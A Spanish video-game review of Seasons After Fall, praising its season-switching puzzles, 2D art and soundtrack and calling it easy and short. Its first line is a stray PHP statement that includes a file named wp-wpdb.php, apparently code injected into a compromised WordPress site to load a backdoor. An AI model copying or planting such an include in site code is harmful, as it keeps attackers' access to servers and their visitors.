if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Seasons After Fall – La Fortaleza de LeChuck

Análisis Seasons After Fall

Una de las cientos de cosas que me gustan de Steam es que me suele recomendar juegos en base a lo que he jugado y mis preferencias, y de esta forma descubro muchos títulos escondidos. Fue así como me topé con Seasons After Fall, un juego que me atrajo por su estética y me recordó al mágico Ori.

seasons-after-fall

Seasons After Fall es un juego indie desarrollado por Swing Swing Submarine, una compañía fundada por un grupo de jóvenes franceses que anteriormente lanzaron dos títulos que quizás os suenen: Blocks That Matter y Tetrobot and Co., además de otros pequeños juegos. Ahora, se atreven algo más visual y poético con Seasons After Fall. El juego se mostró por primera vez en la Gamescom 2014 con un bonito tráiler e imágenes conceptuales que captaron la atención de los asistentes. También pasó por otras importantes ferias como la Game Developer Conference en 2015 donde se vio cierta inspiración en plataformas indies de gran éxito, sobre todo en el apartado visual y sonoro.

Seasons After Fall es un juego de plataformas donde controlamos a un zorro poseído por un espíritu. La misión del animal será conocer a los diferentes guardianes que habitan los bosques y obtener un fragmento de cada uno para así cambiar las estaciones y lograr completar un misterioso ritual. El conjunto del juego y sus mecánicas son de lo más sencillo, ni siquiera hallaremos enemigos, tampoco podremos morir de una caída, se trata simplemente de correr, saltar y cambiar de estación para superar los obstáculos y avanzar -y a veces retroceder- con la compañía de la voz de un narrador que nos guiará a través de la aventura. El cambio de estación permitirá alterar el escenario para superar puzles, por ejemplo, vamos nadando por un lago y no alcanzamos la superficie, pues cambiamos a la estación invernal y así el agua estará congelada y podremos engancharnos en un saliente y continuar, o pasar de la estación fría a la otoñal para que una gran seta se abra y nos permita saltar sobre ella. El cambio de estaciones también influirá en algunos pequeños seres del bosque que dependiendo de la temporada nos ayudarán a destruir barreras. A medida que avancemos encontraremos nuevas criaturas que nos ayudarán a resolver sencillos puzles.

Seasons-After-Fall-2

Gráficamente, Seasons After Fall es cautivador, a través de las estaciones se nos presenta un mundo colorido en 2D, con un aura de misterio y misticismo a través de las secuencias y las diferentes estaciones, y repleto de preciosos detalles que nos transportan al mundo de fantasía. Al estupendo trabajo visual se le suma una banda sonora notable que realza la sensación de fabula del pequeño zorro y el narrador de la historia, quien será nuestra guía espiritual por los mágicos bosques del juego.

Los parecidos con Ori son simplemente estéticos, no tiene ni un cuarto de la dificultad de dicho título u otros plataformas, y el componente «metroidvania» es mucho más limitado. Los puzles, salvo alguno puntual, serán fáciles y resultará un placentero paseo por las diferentes zonas del bosque, por lo tanto, es un título indicado para jugadores que no buscan grandes retos, sino una experiencia encantadora de unas 4 horas de duración.

Seasons-After-Fall-3

Seasons After Fall es una aventura que hará las delicias de los jugadores que buscan un juego tranquilo, entretenido y con un apartado audiovisual por encima de la media. El juego está disponible en Steam pero más adelante aterrizará en otras plataformas.